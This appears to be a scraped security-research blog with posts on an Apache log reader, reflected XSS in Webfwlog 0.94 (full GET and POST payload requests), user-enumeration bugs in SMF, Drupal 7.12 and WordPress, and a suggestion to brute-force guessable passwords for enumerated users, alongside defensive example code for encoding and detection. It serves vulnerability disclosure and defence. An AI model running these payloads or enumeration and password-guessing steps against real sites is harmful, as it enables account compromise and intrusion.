As far as I can see in the logs of my Apache, the last few weeks were very busy for a few guys trying to hack my honeypot ;)
Good job guys!
For some reason I decided to create a very simple (but useful) 'log-reader' for Apache.
You can obviously add it to cron or just run it as a normal Bash script.
Here is the code:
---<code>---
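#!/bin/sh
# For every unique client address in the Apache access log, print its
# DNS and whois details followed by the request lines it sent.
ACCESS="/var/log/apache2/access.log"
FOUND="found.log"
UNIQ="uniq.log"
echo
echo "**** Test Apache logs... ****"
echo
# Field 1 of the common/combined log format is the client address.
cut -d' ' -f1 "$ACCESS" > "$FOUND"
# uniq only drops adjacent duplicates, so sort the list first.
sort -u "$FOUND" > "$UNIQ"
echo "[+] Found host(s) : $(wc -l < "$UNIQ")"
while IFS= read -r host; do
    echo "--------------------------------------------------------------"
    echo "[+] Testing : $host"
    host "$host"
    whois "$host" | grep -e "country" -e "address"
    echo ""
    echo "[+] looking for: "
    # Exact match on the client field (grep would also match substrings);
    # fields 6-8 hold the request line: method, path and protocol.
    awk -v h="$host" '$1 == h' "$ACCESS" | cut -d' ' -f 6-8
    echo "--------------------------------------------------------------"
done < "$UNIQ"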
---<code>---
Monday, 31 March 2014
Friday, 31 January 2014
[EN] webfwlog-0.94 bugs
In the last few days I found 2 XSS bugs in Webfwlog Firewall Log Analyzer.
1st XSS is here:
---<request>---
GET /cms2/webfwlog-0.94/webfwlog/index.php?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes HTTP/1.1
Host: 10.149.14.58
(...)
Connection: close
---<request>---
Response should look like this:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
<input type="submit" name="action" value="Select Data Source">
---<response>---
2nd XSS is here:
---<request>---
POST /cms2/webfwlog-0.94/webfwlog/index.php HTTP/1.1
Host: 10.149.14.58
(...)
Content-Length: 173
page=home&report_order=Last+Accessed&show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&action=Select+Data+Source&ulog_table=&data_source=syslog&syslog_file=messages
---<request>---
And response for this one:
---<response>---
<td align=left colspan="4">
<input type="hidden" name="show_select_data_source" value=""><body/onload=alert(3)>">
<input type="submit" name="action" value="Select Data Source">
---<response>---
So, as we can see, this is the same parameter used (but not filtered) in two places.
Anyway, cool code! ;)
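The fix for both places is output encoding at the point where the parameter is written into the `value` attribute. The following is an added example, not code from webfwlog or from this post: it decodes the parameter from the first request above, renders it with and without encoding into a hypothetical template modelled on the response fragment, and parses the result to see which tags a browser would build.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Request target copied from the first request in the post.
TARGET = (
    '/cms2/webfwlog-0.94/webfwlog/index.php'
    '?show_select_data_source="%3e%3cbody%2fonload%3dalert(3)%3e&restore=yes')

# Hypothetical template modelled on the response fragment in the post.
TEMPLATE = '<input type="hidden" name="show_select_data_source" value="{}">'


def reflected_value(target):
    """Decode the parameter the way the server receives it."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return query["show_select_data_source"][0]


def render_unfiltered(value):
    # Behaviour described in the post: the value is echoed as-is.
    return TEMPLATE.format(value)


def render_encoded(value):
    # quote=True also encodes " and ', which is what keeps the value
    # inside the attribute instead of closing it.
    return TEMPLATE.format(html.escape(value, quote=True))


class TagCollector(HTMLParser):
    """Record every start tag together with its attributes."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(markup):
    """Return the (tag, attributes) pairs found in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags
```

With the unfiltered rendering the parser reports an extra `body` element carrying `onload`; with the encoded rendering there is only the `input` element and its `value` round-trips to the original string, which makes a compact regression test for both the GET and the POST path.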
Monday, 23 April 2012
[EN] Quick news
Hi,
today only one "quick news" ;)
This information will be here as soon as possible, but for "Your information"
(and for "maybe this version is 'version of Your CMS' and You need a quick-patch" ;))
here are listed a few vulnerabilities I found this month.
If You need it fast - let me know, as always, via e-mail ;)
So:
For (now ;)) 04.2012:
01.04 - Joomla 2.5.3 Information disclosure
04.04 - JooDatabase SQL Injection
06.04 - VirtueMart 2.0.2 Information disclosure
07.04 - jNews - Information disclosure
07.04 - Joomla 2.5.4 - Multiple...
07.04 - nBill Lite - HTML Injection / XSS
07.04 - VirtueMart 2.0.2 Information disclosure
11.04 - eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 - ATutor 2.0.4 XSS
15.04 - Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection
16.04 - e107 - reflected XSS
18.04 - HikaShop - Information disclosure
...to be continued... ;)
For 03.2012:
29.03 - gpEasy 2.3.3 XSS
27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 few XSS
25.03 - Quick Cart 5.0 Information disclosure
25.04 - Quick Cart 5.0 CMS XSS
25.04 - Yaqas CMS (Alpha1) - multiple...
18.03 - Quick Cart 5.0 Information disclosure
18.03 - Quick CMS 4.0 XSS
So if You find here any CMS that You are using right now - let me know
if You want to test/patch it.
Monday, 16 April 2012
[EN] SMF CMS 1.1.4 - User enumeration
... or 'user-grabber'.
'How to' do it is not a secret, because SMF provides the possibility
of checking the names of 'registered' users.
Anyway, if You are testing, for example, passwords in an SMF installation,
You can do these steps for Your users (I mean: You are an admin of the SMF You're checking... ;))
(The example presented here actually won't give You "usernames",
You will get only the 'ID's of registered (available) users. I thought giving a tool to
'remote get all users' won't be a good idea ;))
a) the code presented below should help You automate 'user grabbing':
http://pastebin.com/VDfVg2hc
Let me know if You need help with implementing this for 2.0.2 in comments or mail.
b) output:
SMF 1.1.4 CMS - user grabber
Now: what it can be used for.
If You're checking 'possible' (weak) passwords for 'all enumerated users',
You can try a little brute force for passwords (based on usernames) like this:
if a user (name) was grabbed in the scan, then try to log in as him with a password like user1, user123,
resu, password... and all 'guessable' passwords.
If You're doing a pentest with 'password checking' scenarios, maybe this
should help You a little (in automating some work) ;)
More information about other 'enumeration-bugs' from March/April
You can find also here.
Enjoy!
o/
Sunday, 18 March 2012
[EN] Drupal 7.12 - enumeration/counter bug for (registered only)
As I wrote here, there are a few bugs in the latest Drupal (7.12).
I said I would publish it in April, but... enjoy today ;)
# TITLE ....... # Drupal 7.12 enumeration/counter bug for registered only.... #
# DATE ........ # 12.03.2012 ................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com ............................... #
# SOFT LINK ... # http://drupal.org ......................................... #
# VERSION ..... # 7.12....................................................... #
# TESTED ON ... # LAMP ...................................................... #
# ........................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
This is a user enumeration or 'counting bug' (the same situation is
in the latest Wordpress (3.3.1) that I've described at my blog:
#............................................#
# 3. Where is bug :)
In the admin panel we can set permissions for a user like this:
- user can see other profiles
- user can not ;]
The vulnerability (if 'can see') can be used to get the names of other users in the webapp.
The vulnerability (if 'can not') can be used to count users (like in WP3.3.1).
The bug is caused by the way Drupal informs the user about an error.
If we send a 'GET' for the ID of another user, we see either 'Access Denied' or 'Page not found'.
http://drupal-7.12/?q=user/1 <-- user exists : "Access Denied"
http://drupal-7.12/?q=user/123123123 <-- user does not exist : "Page could not be found"
Got it? ;)
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
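On the defending side, this kind of ID walking is visible in the same Apache access log the 'log-reader' above works on. The following added example (not part of the original advisory) flags clients that request many distinct profile IDs; it assumes the 'Access Denied' page is served with status 403 and 'Page could not be found' with 404, and the log lines, addresses and the `min_ids` threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2012:10:00:01 +0100] "GET /?q=user/1 HTTP/1.1" 403 1523 "-" "-"
198.51.100.7 - - [12/Mar/2012:10:00:01 +0100] "GET /?q=user/2 HTTP/1.1" 403 1523 "-" "-"
198.51.100.7 - - [12/Mar/2012:10:00:02 +0100] "GET /?q=user/3 HTTP/1.1" 404 1497 "-" "-"
198.51.100.7 - - [12/Mar/2012:10:00:02 +0100] "GET /?q=user/4 HTTP/1.1" 403 1523 "-" "-"
198.51.100.7 - - [12/Mar/2012:10:00:03 +0100] "GET /?q=user/5 HTTP/1.1" 404 1497 "-" "-"
203.0.113.20 - - [12/Mar/2012:10:05:11 +0100] "GET /?q=node/3 HTTP/1.1" 200 8812 "-" "-"
203.0.113.20 - - [12/Mar/2012:10:05:40 +0100] "GET /?q=user/2 HTTP/1.1" 403 1523 "-" "-"
"""

LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?:GET|HEAD) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Matches ?q=user/<id> and the clean-URL form /user/<id>, but not /user/<id>/edit.
PROFILE = re.compile(r'(?:[?&]q=|^/)user/(\d+)(?:[&?#]|$)')


def enumeration_suspects(log_text, min_ids=5):
    """Return {client: {'exists': [...], 'missing': [...]}} for clients that
    probed at least min_ids distinct profile IDs and got 403 or 404 back."""
    seen = defaultdict(lambda: {"exists": set(), "missing": set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        p = PROFILE.search(m["path"])
        if not p:
            continue
        uid = int(p.group(1))
        if m["status"] == "403":      # assumed: "Access Denied" -> ID exists
            seen[m["client"]]["exists"].add(uid)
        elif m["status"] == "404":    # assumed: "Page could not be found"
            seen[m["client"]]["missing"].add(uid)
    return {
        client: {kind: sorted(ids) for kind, ids in result.items()}
        for client, result in seen.items()
        if len(result["exists"] | result["missing"]) >= min_ids
    }
```

The `exists` list in the result is exactly what the prober learned, so it also tells the administrator which accounts to review.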
Tuesday, 13 March 2012
[EN] Drupal 7.12 user-enumeration
Yep, another day of testing Drupal code, and today I found a user-enumeration bug.
Drupal seems to be vulnerable to user enumeration, but this vulnerability is dedicated to logged-in users only :)
If You want to check it on Your installation, let me know ... ;)
Just like it was with Wordpress bugs.
I will present more technical details in April.
Maybe this one today:
;)
Questions? Priv.
Friday, 2 March 2012
[PL] Wordpress 3.3.1 no-0day exploits - [Update]
Quick Friday note ;)
As I mentioned, in March I intended to publish the details of the bugs found
in the latest (3.3.1) version of Wordpress. However, I decided to share the information with the first 6 people who give a nice reason why they want to learn about these "terrible holes" ;P
The bug is not as terrible as it is painted... ;)
So the "balance" looks like this:
We have an "XSS for a registered user", we have "information disclosure", we have user enumeration and playing with parameters... ;)
Time "stops" on Monday at 23:59. Send Your e-mails here! ;)
Have a nice weekend! o/
* Update 5.03 - 21:20 *
I promised myself that I would not check my mail until the promised "hour 0" had passed.
But something tempted me...
It's incredible that so many people got in touch! ;D Do You all have Wordpress? ;]
The promised "first come, first served" I am sending right away. ;)
However, there has been a small change - a surprise:
Because of such great interest on Your side, I am sending the code+info to everyone
who has written to me so far ;)
Have fun, as long as it's legal! ;)
o/
[EN] Wordpress 3.3.1 no-0day exploits - Updated - 12.03!
Quick note from Friday ;)
As I mentioned here, in March I decided to post some "more technical" details, but...
only for the first 6 of You who send me a message about why I should send the 'details' to them ;>
Still no free-days :< :*
From now to Monday 23:59 Central EU time...
Enjoy Your weekend! ;)
Cheers!
* Update 5.03 - 21:20 *
I promised myself that I wouldn't check my e-mail until "hour 0".
But something tempted me...
It's amazing that there are so many answers/requests! ;D I understand that all of You installed WP? ;]
Like I said, "first come first served", so You should check Your mail now. ;)
Also... :) There is a little "modification - surprise":
Because there were so many requests for code and/or info, I will send it to all people
who asked me about it. For now. ;)
Have fun, but legally! ;)
o/
*Update 12.03.2012*
If You want more information about WordPress vulnerabilities, check this tag!;)
Tuesday, 27 September 2011
WordPress 3.2.1 user enumeration vulnerability
As we all know, not only banks have user enumeration vulnerabilities in their web applications :)
Almost all the time, „user enumeration” is possible because of the way the login process reports ‘wrong credentials’.
So, let's see how it looks in the new WordPress (3.2.1).
(In pseudo code):
if user_ok --> echo 'user ok'
else if user_bad --> echo 'username invalid'
...
So that's the simple way to enumerate users (bruteforce is welcome) ;)
Here I wrote a simple tool to check if there is an admin account:
As You can see, this simple tool can enumerate only ‘admin’. So the idea is simple: check if there is a name (wordlist? ;) ), and if there is - analyse/log the answer.
Regards!
*Update 12.03.2012*
If You want more information about vulnerabilities in latest WordPress,
try here ;)
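The pseudo code above leaks because each failure cause gets its own message. The following added example (not WordPress code and not the author's tool) puts that pattern next to a login check that answers identically for unknown users and wrong passwords; the user store, message strings and function names are constructed for illustration.

```python
import hashlib
import hmac
import os


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store: name -> (salt, password hash).
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash("correct horse", _SALT))}
# Dummy record, so an unknown name costs the same hashing work as a known
# one and response time does not become the next enumeration oracle.
_DUMMY = (os.urandom(16), _hash("unused", os.urandom(16)))


def login_leaky(user, password):
    """Pattern from the pseudo code: one message per failure cause."""
    if user not in USERS:
        return "username invalid"
    salt, stored = USERS[user]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "wrong password"
    return "welcome"


def login_uniform(user, password):
    """Same check, but every failure produces the same answer."""
    salt, stored = USERS.get(user, _DUMMY)
    matches = hmac.compare_digest(_hash(password, salt), stored)
    if matches and user in USERS:
        return "welcome"
    return "invalid username or password"


def distinguishes_users(login, known, unknown, wrong="x"):
    """True when a failed login answers differently for a known and an
    unknown name, i.e. the response can be used to enumerate users."""
    return login(known, wrong) != login(unknown, wrong)
```

`distinguishes_users` can be run against any login function in a test suite; registration and password-reset forms need the same treatment, since they usually reveal the same information.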